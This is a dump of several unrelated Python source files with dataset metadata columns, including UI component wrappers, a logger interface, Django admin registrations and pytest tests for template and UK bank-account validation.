source="canvas",
shape=(28, 28),
invert_colors=True,
**kwargs
)
class Plot(components.Image):
def __init__(self, **kwargs):
"""
Custom component
@param kwargs:
"""
self.is_template = True
super().__init__(type="plot", **kwargs)
class Pil(components.Image):
def __init__(self, **kwargs):
"""
Custom component
@param kwargs:
"""
self.is_template = True
super().__init__(type="pil", **kwargs)
class PlayableVideo(components.Video):
def __init__(self, **kwargs):
"""
Custom component
@param kwargs:
"""
self.is_template = True
super().__init__(type="mp4", **kwargs)
class Microphone(components.Audio):
def __init__(self, **kwargs):
"""
Custom component
@param kwargs:
"""
self.is_template = True
super().__init__(source="microphone", **kwargs)
class Mic(components.Audio):
def __init__(self, **kwargs):
"""
Custom component
@param kwargs:
"""
self.is_template = True
super().__init__(source="microphone", **kwargs)
class Files(components.File):
def __init__(self, **kwargs):
"""
Custom component
@param kwargs:
"""
self.is_template = True
super().__init__(file_count="multiple", **kwargs)
class Numpy(components.Dataframe):
def __init__(self, **kwargs):
"""
Custom component
@param kwargs:
"""
self.is_template = True
super().__init__(type="numpy", **kwargs)
class Matrix(components.Dataframe):
def __init__(self, **kwargs):
"""
Custom component
@param kwargs:
"""
self.is_template = True
super().__init__(type="array", **kwargs)
class List(components.Dataframe):
def __init__(self, **kwargs):
"""
Custom component
@param kwargs:
"""
self.is_template = True
super().__init__(type="array", col_count=1, **kwargs)
class Highlight(components.HighlightedText):
def __init__(self, **kwargs):
"""
Custom component
@param kwargs:
"""
self.is_template = True
super().__init__(**kwargs)
| 22.222973
| 61
| 0.544846
| 309
| 3,289
| 5.378641
| 0.174757
| 0.058965
| 0.092659
| 0.143201
| 0.761131
| 0.761131
| 0.761131
| 0.761131
| 0.761131
| 0.761131
| 0
| 0.003586
| 0.321678
| 3,289
| 147
| 62
| 22.37415
| 0.741372
| 0.135908
| 0
| 0.47619
| 0
| 0
| 0.02742
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.222222
| false
| 0
| 0.015873
| 0
| 0.460317
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
518ddb1bf1a37f449a239c79dd7d07a12f51fc3d
| 336
|
py
|
Python
|
src/loggers/logger.py
|
Kaltsoon/dead-link-checker
|
acf9364546e5606f9cebf00a847e3ac6322627c4
|
[
"MIT"
] | 1
|
2021-11-01T19:30:10.000Z
|
2021-11-01T19:30:10.000Z
|
src/loggers/logger.py
|
Kaltsoon/dead-link-checker
|
acf9364546e5606f9cebf00a847e3ac6322627c4
|
[
"MIT"
] | null | null | null |
src/loggers/logger.py
|
Kaltsoon/dead-link-checker
|
acf9364546e5606f9cebf00a847e3ac6322627c4
|
[
"MIT"
] | null | null | null |
class Logger:
def info(self, message: str) -> None:
raise NotImplementedError()
def success(self, message: str) -> None:
raise NotImplementedError()
def warning(self, message: str) -> None:
raise NotImplementedError()
def error(self, message: str) -> None:
raise NotImplementedError()
| 25.846154
| 44
| 0.636905
| 34
| 336
| 6.294118
| 0.382353
| 0.205607
| 0.261682
| 0.336449
| 0.827103
| 0.827103
| 0.630841
| 0
| 0
| 0
| 0
| 0
| 0.252976
| 336
| 12
| 45
| 28
| 0.85259
| 0
| 0
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.444444
| false
| 0
| 0
| 0
| 0.555556
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
518e4130bb1f8405bf4a40dded9191a4239457b0
| 78
|
py
|
Python
|
mmdet3d/runners/xmuda/__init__.py
|
XYHC-MMDA/Multi-modal-Multi-task-DA
|
ed8297eb489d50c580795713cccb72bc958f406f
|
[
"Apache-2.0"
] | 1
|
2020-11-05T19:51:23.000Z
|
2020-11-05T19:51:23.000Z
|
mmdet3d/runners/xmuda/__init__.py
|
XYHC-MMDA/Multi-modal-Multi-task-DA
|
ed8297eb489d50c580795713cccb72bc958f406f
|
[
"Apache-2.0"
] | null | null | null |
mmdet3d/runners/xmuda/__init__.py
|
XYHC-MMDA/Multi-modal-Multi-task-DA
|
ed8297eb489d50c580795713cccb72bc958f406f
|
[
"Apache-2.0"
] | null | null | null |
from .xmuda_runner import XmudaRunner
from .source_runner import SourceRunner
| 26
| 39
| 0.871795
| 10
| 78
| 6.6
| 0.7
| 0.363636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102564
| 78
| 2
| 40
| 39
| 0.942857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
a40af18464639b948799d5972dbeee3c9d05202d
| 137
|
py
|
Python
|
protos/__init__.py
|
daogework/grpc-file-transfer
|
eea4f9dbe88cc5ca1dd7b7a12b0ffbec0d69b8b9
|
[
"MIT"
] | 4
|
2020-05-21T14:06:09.000Z
|
2021-12-17T23:35:42.000Z
|
protos/__init__.py
|
daogework/grpc-file-transfer
|
eea4f9dbe88cc5ca1dd7b7a12b0ffbec0d69b8b9
|
[
"MIT"
] | null | null | null |
protos/__init__.py
|
daogework/grpc-file-transfer
|
eea4f9dbe88cc5ca1dd7b7a12b0ffbec0d69b8b9
|
[
"MIT"
] | 5
|
2020-07-06T09:27:42.000Z
|
2022-01-10T09:52:28.000Z
|
import os
import sys
import grpc_tools.command
sys.path.append(os.path.dirname(__file__))
grpc_tools.command.build_package_protos("")
| 15.222222
| 43
| 0.810219
| 21
| 137
| 4.904762
| 0.619048
| 0.174757
| 0.31068
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.080292
| 137
| 8
| 44
| 17.125
| 0.81746
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
cfad529c9118b12946c46ca9054389d340aed9a3
| 39
|
py
|
Python
|
python_circular_import/demo1/b.py
|
NightmareQAQ/python-notes
|
4e766be06073a495ff9654f0dd8c0bb03310c559
|
[
"MIT"
] | 106
|
2017-05-02T10:25:50.000Z
|
2022-03-23T14:57:28.000Z
|
python_circular_import/demo1/b.py
|
NightmareQAQ/python-notes
|
4e766be06073a495ff9654f0dd8c0bb03310c559
|
[
"MIT"
] | 2
|
2021-01-14T15:07:15.000Z
|
2021-12-21T07:18:05.000Z
|
python_circular_import/demo1/b.py
|
NightmareQAQ/python-notes
|
4e766be06073a495ff9654f0dd8c0bb03310c559
|
[
"MIT"
] | 42
|
2017-07-31T07:07:38.000Z
|
2021-12-26T09:36:55.000Z
|
def hello():
print('hello in b.py')
| 19.5
| 26
| 0.589744
| 7
| 39
| 3.285714
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.205128
| 39
| 2
| 26
| 19.5
| 0.741935
| 0
| 0
| 0
| 0
| 0
| 0.325
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0
| 0.5
| 0.5
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
5c54f8720af9c945341c0ed84b706166982af3b8
| 3,101
|
py
|
Python
|
test/validators/test_template.py
|
samadhicsec/threatware
|
f45068cfbbc2207ffa2b8f1b965b98cfb1ed9096
|
[
"Apache-2.0"
] | null | null | null |
test/validators/test_template.py
|
samadhicsec/threatware
|
f45068cfbbc2207ffa2b8f1b965b98cfb1ed9096
|
[
"Apache-2.0"
] | null | null | null |
test/validators/test_template.py
|
samadhicsec/threatware
|
f45068cfbbc2207ffa2b8f1b965b98cfb1ed9096
|
[
"Apache-2.0"
] | null | null | null |
import pytest
import validators.template
from data.key import key as Key
def test_valid_template():
config = {}
config["output_text_valid"] = "Valid: Key '{}', value '{}', template value '{}'"
config["output_text_invalid"] = "Invalid: Key '{}', value '{}', , template values {}"
# If we read this key and value from a model
test_key = Key("test-key", ["template-verification-test"])
valid_value = "value from template"
# And the same key and value exists in the template
template_key = Key("test-key", ["template-verification-test"])
template = {template_key:"value from template"}
references = {}
references['validator-tag'] = "template-verification-test"
references['template-model'] = template
# then validate should return True
result = validators.template.validate(config, test_key, valid_value, references)
property_text = test_key.getProperty(references['validator-tag'])
assert result == True
assert property_text == config["output_text_valid"].format(test_key, valid_value, template[template_key])
def test_invalid_template_invalid_value():
config = {}
config["output_text_valid"] = "Valid: Key '{}', value '{}'"
config["output_text_invalid"] = "Invalid: Key '{}', value '{}'"
# If we read this key and value from a model
test_key = Key("test-key", ["template-verification-test"])
invalid_value = "value not from template"
# And the same key and value exists in the template
template_key = Key("test-key", ["template-verification-test"])
template = {template_key:"value from template"}
references = {}
references['validator-tag'] = "template-verification-test"
references['template-model'] = template
# then validate should return True
result = validators.template.validate(config, test_key, invalid_value, references)
property_text = test_key.getProperty(references['validator-tag'])
assert result == False
assert property_text == config["output_text_invalid"].format(test_key, invalid_value, [template[template_key]])
def test_invalid_template_invalid_key():
config = {}
config["output_text_valid"] = "Valid: Key '{}', value '{}'"
config["output_text_invalid"] = "Invalid: Key '{}', value '{}'"
# If we read this key and value from a model
test_key = Key("different-test-key", ["template-verification-test"])
valid_value = "value from template"
# And the same key and value exists in the template
template_key = Key("test-key", ["template-verification-test"])
template = {template_key:"value from template"}
references = {}
references['validator-tag'] = "template-verification-test"
references['template-model'] = template
# then validate should return True
result = validators.template.validate(config, test_key, valid_value, references)
property_text = test_key.getProperty(references['validator-tag'])
assert result == False
assert property_text == config["output_text_invalid"].format(test_key, valid_value, [template[template_key]])
| 37.817073
| 115
| 0.693002
| 376
| 3,101
| 5.545213
| 0.119681
| 0.060432
| 0.069065
| 0.077698
| 0.921823
| 0.921823
| 0.905516
| 0.905516
| 0.843165
| 0.792326
| 0
| 0
| 0.17704
| 3,101
| 81
| 116
| 38.283951
| 0.817006
| 0.121574
| 0
| 0.6875
| 0
| 0
| 0.333088
| 0.08622
| 0
| 0
| 0
| 0
| 0.125
| 1
| 0.0625
| false
| 0
| 0.0625
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
7a5623937f87a57117a2363deb97534023ad8774
| 29
|
py
|
Python
|
manitou/__init__.py
|
immstudios/manitou
|
ceba87778f1b7695951c6b7a5f60def2825978b5
|
[
"MIT"
] | 1
|
2021-01-10T07:04:30.000Z
|
2021-01-10T07:04:30.000Z
|
manitou/__init__.py
|
immstudios/manitou
|
ceba87778f1b7695951c6b7a5f60def2825978b5
|
[
"MIT"
] | null | null | null |
manitou/__init__.py
|
immstudios/manitou
|
ceba87778f1b7695951c6b7a5f60def2825978b5
|
[
"MIT"
] | 1
|
2021-01-10T07:04:46.000Z
|
2021-01-10T07:04:46.000Z
|
from .manitou import Manitou
| 14.5
| 28
| 0.827586
| 4
| 29
| 6
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.137931
| 29
| 1
| 29
| 29
| 0.96
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
7a758924f9447e53a38d5246bcbf0ae1d3414048
| 224
|
py
|
Python
|
cluster_tools/downscaling/__init__.py
|
constantinpape/cluster_tools
|
a7e88545b58f8315723bc47583916e1900a7892d
|
[
"MIT"
] | 28
|
2018-12-09T22:11:52.000Z
|
2022-02-01T16:48:23.000Z
|
cluster_tools/downscaling/__init__.py
|
constantinpape/cluster_tools
|
a7e88545b58f8315723bc47583916e1900a7892d
|
[
"MIT"
] | 16
|
2019-01-27T10:59:33.000Z
|
2022-01-11T09:09:24.000Z
|
cluster_tools/downscaling/__init__.py
|
constantinpape/cluster_tools
|
a7e88545b58f8315723bc47583916e1900a7892d
|
[
"MIT"
] | 11
|
2018-12-09T22:11:56.000Z
|
2021-08-08T20:10:13.000Z
|
from . downscaling_workflow import DownscalingWorkflow, PainteraToBdvWorkflow
from . upscaling import UpscalingLocal, UpscalingSlurm, UpscalingLSF
from . downscaling import DownscalingLocal, DownscalingSlurm, DownscalingLSF
| 56
| 77
| 0.875
| 18
| 224
| 10.833333
| 0.722222
| 0.153846
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.089286
| 224
| 3
| 78
| 74.666667
| 0.955882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
7a777da8aafdc3875ae134c2d184fc1efe77c105
| 39
|
py
|
Python
|
auth_signup_confirmation/controllers/__init__.py
|
agenterpgmbh/misc-addons
|
27e36d119b1e73089a2ebfcd8d4cfc706c8f1f41
|
[
"MIT"
] | null | null | null |
auth_signup_confirmation/controllers/__init__.py
|
agenterpgmbh/misc-addons
|
27e36d119b1e73089a2ebfcd8d4cfc706c8f1f41
|
[
"MIT"
] | 1
|
2020-05-03T04:27:29.000Z
|
2020-05-03T04:27:29.000Z
|
auth_signup_confirmation/controllers/__init__.py
|
eneldoserrata/misc-addons
|
6f3b94d8a71d603d9ad449f96edfc66385e78080
|
[
"MIT"
] | 2
|
2020-05-09T02:08:59.000Z
|
2022-03-21T06:37:15.000Z
|
from . import auth_signup_confirmation
| 19.5
| 38
| 0.871795
| 5
| 39
| 6.4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102564
| 39
| 1
| 39
| 39
| 0.914286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
7aae8df08b7f4f997abe8acb65c905a5c4586739
| 3,339
|
py
|
Python
|
test/tests/api/validate/test_validator_for_known_accounts.py
|
j-puri/random-uk-bank-account
|
caa5e91907641893dfb8969fcef18159bdc74223
|
[
"MIT"
] | null | null | null |
test/tests/api/validate/test_validator_for_known_accounts.py
|
j-puri/random-uk-bank-account
|
caa5e91907641893dfb8969fcef18159bdc74223
|
[
"MIT"
] | 4
|
2021-05-01T13:04:31.000Z
|
2022-03-02T21:22:35.000Z
|
test/tests/api/validate/test_validator_for_known_accounts.py
|
j-puri/random-uk-bank-account
|
caa5e91907641893dfb8969fcef18159bdc74223
|
[
"MIT"
] | null | null | null |
import pytest
from test.utils.test_fixtures.classes_under_test import generator
@pytest.mark.parametrize(
"sort_code,account_number", [
("118765", "64371389")
])
def test_known_values_for_exception_1(generator, sort_code, account_number):
assert generator.validate(sort_code=sort_code, account_number=account_number)
@pytest.mark.parametrize(
"sort_code,account_number", [
("309070", "02355688"),
("309070", "12345668"),
("309070", "12345677"),
("309070", "99345694")
])
def test_known_values_for_exception_2_and_9(generator, sort_code, account_number):
assert generator.validate(sort_code=sort_code, account_number=account_number)
@pytest.mark.parametrize(
"sort_code,account_number", [
("820000", "73688637"),
("827999", "73988638"),
("827101", "28748352"),
])
def test_known_values_for_exception_3(generator, sort_code, account_number):
assert generator.validate(sort_code=sort_code, account_number=account_number)
@pytest.mark.parametrize(
"sort_code,account_number", [
("134020", "63849203")
])
def test_known_values_for_exception_4(generator, sort_code, account_number):
assert generator.validate(sort_code=sort_code, account_number=account_number)
@pytest.mark.parametrize(
"sort_code,account_number", [
("938611", "07806039"),
("938611", "42368003"),
("938063", "55065200")
])
def test_known_values_for_exception_5(generator, sort_code, account_number):
assert generator.validate(sort_code=sort_code, account_number=account_number)
@pytest.mark.parametrize(
"sort_code,account_number", [
("200915", "41011166")
])
def test_known_values_for_exception_6(generator, sort_code, account_number):
assert generator.validate(sort_code=sort_code, account_number=account_number)
@pytest.mark.parametrize(
"sort_code,account_number", [
("772798", "99345694")
])
def test_known_values_for_exception_7(generator, sort_code, account_number):
assert generator.validate(sort_code=sort_code, account_number=account_number)
@pytest.mark.parametrize(
"sort_code,account_number", [
("086090", "06774744")
])
def test_known_values_for_exception_8(generator, sort_code, account_number):
assert generator.validate(sort_code=sort_code, account_number=account_number)
@pytest.mark.parametrize(
"sort_code,account_number", [
("871427", "46238510"),
("872427", "46238510"),
("871427", "09123496"),
("871427", "99123496"),
])
def test_known_values_for_exception_10_and_11(generator, sort_code, account_number):
assert generator.validate(sort_code=sort_code, account_number=account_number)
@pytest.mark.parametrize(
"sort_code,account_number", [
("074456", "12345112"),
("070116", "34012583"),
("074456", "11104102")
])
def test_known_values_for_exception_12_and_13(generator, sort_code, account_number):
assert generator.validate(sort_code=sort_code, account_number=account_number)
@pytest.mark.parametrize(
"sort_code,account_number", [
("180002", "00000190")
])
def test_known_values_for_exception_14(generator, sort_code, account_number):
assert generator.validate(sort_code=sort_code, account_number=account_number)
| 32.105769
| 84
| 0.720875
| 394
| 3,339
| 5.72335
| 0.187817
| 0.156098
| 0.219512
| 0.307317
| 0.821729
| 0.821729
| 0.701996
| 0.649667
| 0.649667
| 0.649667
| 0
| 0.120623
| 0.153339
| 3,339
| 103
| 85
| 32.417476
| 0.677043
| 0
| 0
| 0.55
| 0
| 0
| 0.175502
| 0.079066
| 0
| 0
| 0
| 0
| 0.1375
| 1
| 0.1375
| false
| 0
| 0.025
| 0
| 0.1625
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
7abefc35bcfb4652c92f2f58cd8efb1e7a4a7f56
| 21
|
py
|
Python
|
server.py
|
v0idpwn/2dqg
|
506b9f636c06b296175edb26c33c06c2d1e685d5
|
[
"BSD-2-Clause"
] | 5
|
2017-10-02T19:07:28.000Z
|
2017-11-11T17:02:30.000Z
|
server.py
|
v0idpwn/2dqg
|
506b9f636c06b296175edb26c33c06c2d1e685d5
|
[
"BSD-2-Clause"
] | 9
|
2017-10-02T05:39:17.000Z
|
2018-12-17T11:23:43.000Z
|
server.py
|
v0idpwn/2dqg
|
506b9f636c06b296175edb26c33c06c2d1e685d5
|
[
"BSD-2-Clause"
] | 11
|
2017-10-02T06:13:49.000Z
|
2017-10-30T06:30:16.000Z
|
from quiz import app
| 10.5
| 20
| 0.809524
| 4
| 21
| 4.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.190476
| 21
| 1
| 21
| 21
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
8f8ba795d42e1f9dd3151c59300403efab670d87
| 146
|
py
|
Python
|
ads_project/chatAPI/admin.py
|
bornajouya/softio
|
d309fb9f67bdabc1a1d6886cb92569c53ece2172
|
[
"Unlicense"
] | null | null | null |
ads_project/chatAPI/admin.py
|
bornajouya/softio
|
d309fb9f67bdabc1a1d6886cb92569c53ece2172
|
[
"Unlicense"
] | null | null | null |
ads_project/chatAPI/admin.py
|
bornajouya/softio
|
d309fb9f67bdabc1a1d6886cb92569c53ece2172
|
[
"Unlicense"
] | null | null | null |
from django.contrib import admin
from .models import chat
# Register your models here.
admin.site.register(chat)
# admin.site.register(fk_model)
| 20.857143
| 32
| 0.794521
| 22
| 146
| 5.227273
| 0.590909
| 0.156522
| 0.295652
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.116438
| 146
| 6
| 33
| 24.333333
| 0.891473
| 0.383562
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
8fb60cd9cf4e4086556e935cf5d55b7ff3cdd406
| 154
|
py
|
Python
|
eod/data/metrics/__init__.py
|
Helicopt/EOD
|
b5db36f4ce267bf64d093b8174bde2c4097b4718
|
[
"Apache-2.0"
] | 1
|
2021-11-24T09:32:27.000Z
|
2021-11-24T09:32:27.000Z
|
eod/data/metrics/__init__.py
|
jinfagang/EOD
|
a45b74430070d82d9248a10fb5e1116bb7ababe1
|
[
"Apache-2.0"
] | null | null | null |
eod/data/metrics/__init__.py
|
jinfagang/EOD
|
a45b74430070d82d9248a10fb5e1116bb7ababe1
|
[
"Apache-2.0"
] | null | null | null |
from .base_evaluator import Evaluator, Metric # noqa
from .coco_evaluator import CocoEvaluator # noqa
from .custom_evaluator import CustomEvaluator # noqa
| 51.333333
| 52
| 0.837662
| 19
| 154
| 6.631579
| 0.526316
| 0.357143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.116883
| 154
| 3
| 53
| 51.333333
| 0.926471
| 0.090909
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
8fb96f5ee0397a8660aced258444409b290737e8
| 129
|
py
|
Python
|
ros_ws/src/baxter_interface/src/baxter_interface/navigator.py
|
mesneym/Baxter-Arm-PP
|
fdbf86309bc64c31af105daa026b2f8519710129
|
[
"MIT"
] | null | null | null |
ros_ws/src/baxter_interface/src/baxter_interface/navigator.py
|
mesneym/Baxter-Arm-PP
|
fdbf86309bc64c31af105daa026b2f8519710129
|
[
"MIT"
] | null | null | null |
ros_ws/src/baxter_interface/src/baxter_interface/navigator.py
|
mesneym/Baxter-Arm-PP
|
fdbf86309bc64c31af105daa026b2f8519710129
|
[
"MIT"
] | null | null | null |
version https://git-lfs.github.com/spec/v1
oid sha256:c557e8dc7413cddc3211426a539f644665da17b7284843a71992c7a93f297e37
size 6026
| 32.25
| 75
| 0.883721
| 13
| 129
| 8.769231
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.439024
| 0.046512
| 129
| 3
| 76
| 43
| 0.487805
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
8fc2e5098f3e026991bdfcbf4869013366dc05e4
| 61
|
py
|
Python
|
swiftwind/core/exceptions.py
|
m-den-i/swiftwind
|
3af9a1ec3327a992f1d3f2c11fefbb3c06cadbce
|
[
"MIT"
] | 11
|
2016-12-13T00:46:48.000Z
|
2020-07-28T13:44:12.000Z
|
swiftwind/core/exceptions.py
|
m-den-i/swiftwind
|
3af9a1ec3327a992f1d3f2c11fefbb3c06cadbce
|
[
"MIT"
] | 15
|
2017-11-29T19:38:32.000Z
|
2018-11-02T21:08:04.000Z
|
swiftwind/core/exceptions.py
|
m-den-i/swiftwind
|
3af9a1ec3327a992f1d3f2c11fefbb3c06cadbce
|
[
"MIT"
] | 4
|
2018-10-23T12:39:04.000Z
|
2019-12-30T11:06:23.000Z
|
class CannotCreateMultipleSettingsInstances(Exception): pass
| 30.5
| 60
| 0.901639
| 4
| 61
| 13.75
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.04918
| 61
| 1
| 61
| 61
| 0.948276
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 1
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 6
|
8fd8d730edd65969459a4cb5a226ee18635c9bac
| 123
|
py
|
Python
|
rambo/resources/admin.py
|
sirmmo/RaMBo
|
81a87705a2aaa39256f48026021001c074dd9035
|
[
"BSD-2-Clause"
] | 1
|
2019-06-13T15:59:43.000Z
|
2019-06-13T15:59:43.000Z
|
rambo/resources/admin.py
|
sirmmo/RaMBo
|
81a87705a2aaa39256f48026021001c074dd9035
|
[
"BSD-2-Clause"
] | null | null | null |
rambo/resources/admin.py
|
sirmmo/RaMBo
|
81a87705a2aaa39256f48026021001c074dd9035
|
[
"BSD-2-Clause"
] | null | null | null |
from django.contrib import admin
from models import *
admin.site.register(Resource)
admin.site.register(UserConnection)
| 15.375
| 35
| 0.813008
| 16
| 123
| 6.25
| 0.625
| 0.22
| 0.34
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.105691
| 123
| 7
| 36
| 17.571429
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
64f891d31e2da822ffa88c357147e3178971adf9
| 408
|
py
|
Python
|
sentiment-analysis/tests/test_data/test_sentences.py
|
arturgontijo/nlp-services
|
2bb3cef4aea4cd0687e984ef2414d5d2b8edc134
|
[
"MIT"
] | 15
|
2018-09-03T05:58:22.000Z
|
2020-07-01T04:52:49.000Z
|
sentiment-analysis/tests/test_data/test_sentences.py
|
arturgontijo/nlp-services
|
2bb3cef4aea4cd0687e984ef2414d5d2b8edc134
|
[
"MIT"
] | 33
|
2018-08-08T17:55:11.000Z
|
2021-06-01T14:27:16.000Z
|
sentiment-analysis/tests/test_data/test_sentences.py
|
arturgontijo/nlp-services
|
2bb3cef4aea4cd0687e984ef2414d5d2b8edc134
|
[
"MIT"
] | 25
